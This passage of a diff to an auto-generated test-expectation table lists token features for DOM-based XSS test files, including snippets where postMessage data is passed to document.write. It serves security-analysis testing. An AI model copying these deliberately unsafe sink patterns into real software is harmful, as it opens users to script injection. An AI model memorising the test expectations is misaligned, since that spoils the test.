| e | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:28:27:28 | e | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:28:27:28 | e | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:28:27:28 | e | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:28:27:28 | e | fileImports | | | autogenerated/Xss/DomBasedXss/addEventListener.js:27:28:27:33 | e.data | CalleeFlexibleAccessPath | document.write | | autogenerated/Xss/DomBasedXss/addEventListener.js:27:28:27:33 | e.data | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/addEventListener.js:27:28:27:33 | e.data | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | @@ -11915,6 +90331,141 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/addEventListener.js:27:28:27:33 | e.data | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/addEventListener.js:27:28:27:33 | e.data | fileImports | | | autogenerated/Xss/DomBasedXss/addEventListener.js:27:28:27:33 | e.data | receiverName | document | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:30:27:33 | data | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:30:27:33 | data | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:30:27:33 | data | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:30:27:33 | data | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:30:27:33 | data | fileImports | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:1:1:0 | this | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:1:1:0 | this | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:1:1:1 | \u0275getDOM | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:1:1:1 | \u0275getDOM | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:1:1:1 | \u0275getDOM | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:1:1:81 | import ... /core'; | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:1:1:81 | import ... /core'; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:1:1:81 | import ... /core'; | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:10:1:18 | Component | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:10:1:18 | Component | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:10:1:18 | Component | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:10:1:18 | Component | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:10:1:18 | Component | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:10:1:18 | Component | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:10:1:18 | Component | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:10:1:18 | Component | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:10:1:18 | Component | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:10:1:18 | Component | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:10:1:18 | Component | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:10:1:18 | Component | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:21:1:26 | OnInit | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:21:1:26 | OnInit | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:21:1:26 | OnInit | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:21:1:26 | OnInit | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:21:1:26 | OnInit | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:21:1:26 | OnInit | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:21:1:26 | OnInit | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:21:1:26 | OnInit | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:21:1:26 | OnInit | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:29:1:40 | DomSanitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:29:1:40 | DomSanitizer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:29:1:40 | DomSanitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:29:1:57 | DomSani ... itizer2 | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:29:1:57 | DomSani ... itizer2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:29:1:57 | DomSani ... itizer2 | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:45:1:57 | DomSanitizer2 | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:45:1:57 | DomSanitizer2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:45:1:57 | DomSanitizer2 | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:66:1:80 | '@angular/core' | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:66:1:80 | '@angular/core' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:1:66:1:80 | '@angular/core' | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:2:1:2:42 | import ... ommon'; | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:2:1:2:42 | import ... ommon'; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:2:1:2:42 | import ... ommon'; | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:2:10:2:16 | \\u0275getDOM | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:2:10:2:16 | \\u0275getDOM | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:2:10:2:16 | \\u0275getDOM | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:2:10:2:16 | \\u0275getDOM | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:2:10:2:16 | \\u0275getDOM | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:2:10:2:16 | \\u0275getDOM | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:2:10:2:16 | \\u0275getDOM | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:2:10:2:16 | \\u0275getDOM | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:2:10:2:16 | \\u0275getDOM | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:2:10:2:16 | \u0275getDOM | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:2:10:2:16 | \u0275getDOM | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:2:10:2:16 | \u0275getDOM | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:2:10:2:16 | \u0275getDOM | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:2:25:2:41 | '@angular/common' | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:2:25:2:41 | '@angular/common' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:2:25:2:41 | '@angular/common' | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:1:3:81 | import ... outer'; | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:1:3:81 | import ... outer'; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:1:3:81 | import ... outer'; | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:10:3:23 | ActivatedRoute | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:10:3:23 | ActivatedRoute | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:10:3:23 | ActivatedRoute | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:10:3:23 | ActivatedRoute | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:10:3:23 | ActivatedRoute | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:10:3:23 | ActivatedRoute | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:10:3:23 | ActivatedRoute | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:10:3:23 | ActivatedRoute | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:10:3:23 | ActivatedRoute | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:26:3:47 | Activat ... napshot | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:26:3:47 | Activat ... napshot | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:26:3:47 | Activat ... napshot | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:26:3:47 | Activat ... napshot | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:26:3:47 | Activat ... napshot | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:26:3:47 | Activat ... napshot | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:26:3:47 | Activat ... napshot | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:26:3:47 | Activat ... napshot | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:26:3:47 | Activat ... napshot | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:50:3:55 | Router | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:50:3:55 | Router | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:50:3:55 | Router | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:50:3:55 | Router | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:50:3:55 | Router | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:50:3:55 | Router | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:50:3:55 | Router | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:50:3:55 | Router | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:50:3:55 | Router | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:64:3:80 | '@angular/router' | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:64:3:80 | '@angular/router' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:3:64:3:80 | '@angular/router' | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:4:1:4:57 | import ... owser'; | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:4:1:4:57 | import ... owser'; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:4:1:4:57 | import ... owser'; | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:4:10:4:21 | DomSanitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:4:10:4:21 | DomSanitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:4:10:4:21 | DomSanitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:4:10:4:21 | DomSanitizer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:4:10:4:21 | DomSanitizer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:4:10:4:21 | DomSanitizer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:4:10:4:21 | DomSanitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:4:10:4:21 | DomSanitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:4:10:4:21 | DomSanitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:4:30:4:56 | '@angul ... rowser' | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:4:30:4:56 | '@angul ... rowser' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:4:30:4:56 | '@angul ... rowser' | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:6:1:10:2 | @Compon ... ss']\\n}) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:6:1:10:2 | @Compon ... ss']\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:6:1:10:2 | @Compon ... ss']\\n}) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:6:2:6:10 | Component | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:6:2:6:10 | Component | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:6:2:6:10 | Component | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:6:2:10:2 | Compone ... ss']\\n}) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:6:2:10:2 | Compone ... ss']\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:6:2:10:2 | Compone ... ss']\\n}) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:6:2:10:2 | exceptional return of Compone ... ss']\\n}) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:6:2:10:2 | exceptional return of Compone ... ss']\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:6:2:10:2 | exceptional return of Compone ... ss']\\n}) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:7:3:7:10 | selector | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:7:3:7:10 | selector | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:7:3:7:10 | selector | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:7:3:7:22 | selector: 'app-root' | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:7:3:7:22 | selector: 'app-root' | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:7:3:7:22 | selector: 'app-root' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:7:3:7:22 | selector: 'app-root' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:7:3:7:22 | selector: 'app-root' | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:7:3:7:22 | selector: 'app-root' | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | | autogenerated/Xss/DomBasedXss/angular2-client.ts:7:13:7:22 | 'app-root' | CalleeFlexibleAccessPath | Component | | autogenerated/Xss/DomBasedXss/angular2-client.ts:7:13:7:22 | 'app-root' | InputAccessPathFromCallee | 0.selector | | autogenerated/Xss/DomBasedXss/angular2-client.ts:7:13:7:22 | 'app-root' | InputArgumentIndex | 0 | @@ -11923,6 +90474,15 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/angular2-client.ts:7:13:7:22 | 'app-root' | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | | autogenerated/Xss/DomBasedXss/angular2-client.ts:7:13:7:22 | 'app-root' | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/angular2-client.ts:7:13:7:22 | 'app-root' | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:8:3:8:13 | templateUrl | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:8:3:8:13 | templateUrl | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:8:3:8:13 | templateUrl | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:8:3:8:37 | templat ... t.html' | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:8:3:8:37 | templat ... t.html' | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:8:3:8:37 | templat ... t.html' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:8:3:8:37 | templat ... t.html' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:8:3:8:37 | templat ... t.html' | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:8:3:8:37 | templat ... t.html' | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | | autogenerated/Xss/DomBasedXss/angular2-client.ts:8:16:8:37 | './app. ... t.html' | CalleeFlexibleAccessPath | Component | | autogenerated/Xss/DomBasedXss/angular2-client.ts:8:16:8:37 | './app. ... t.html' | InputAccessPathFromCallee | 0.templateUrl | | autogenerated/Xss/DomBasedXss/angular2-client.ts:8:16:8:37 | './app. ... t.html' | InputArgumentIndex | 0 | @@ -11931,6 +90491,15 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/angular2-client.ts:8:16:8:37 | './app. ... t.html' | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | | autogenerated/Xss/DomBasedXss/angular2-client.ts:8:16:8:37 | './app. ... t.html' | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/angular2-client.ts:8:16:8:37 | './app. ... t.html' | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:9:3:9:11 | styleUrls | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:9:3:9:11 | styleUrls | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:9:3:9:11 | styleUrls | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:9:3:9:36 | styleUr ... t.css'] | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:9:3:9:36 | styleUr ... t.css'] | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:9:3:9:36 | styleUr ... t.css'] | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:9:3:9:36 | styleUr ... t.css'] | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:9:3:9:36 | styleUr ... t.css'] | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:9:3:9:36 | styleUr ... t.css'] | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | | autogenerated/Xss/DomBasedXss/angular2-client.ts:9:14:9:36 | ['./app ... t.css'] | CalleeFlexibleAccessPath | Component | | autogenerated/Xss/DomBasedXss/angular2-client.ts:9:14:9:36 | ['./app ... t.css'] | InputAccessPathFromCallee | 0.styleUrls | | autogenerated/Xss/DomBasedXss/angular2-client.ts:9:14:9:36 | ['./app ... t.css'] | InputArgumentIndex | 0 | @@ -11940,8 +90509,222 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/angular2-client.ts:9:14:9:36 | ['./app ... t.css'] | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/angular2-client.ts:9:14:9:36 | ['./app ... t.css'] | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | | autogenerated/Xss/DomBasedXss/angular2-client.ts:9:15:9:35 | './app. ... nt.css' | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:9:15:9:35 | './app. ... nt.css' | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:9:15:9:35 | './app. ... nt.css' | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/angular2-client.ts:9:15:9:35 | './app. ... nt.css' | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/angular2-client.ts:9:15:9:35 | './app. ... nt.css' | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:9:15:9:35 | './app. ... nt.css' | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:11:8:46:1 | class A ... K\\n }\\n} | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:11:8:46:1 | class A ... K\\n }\\n} | contextSurroundingFunctionParameters | | +| 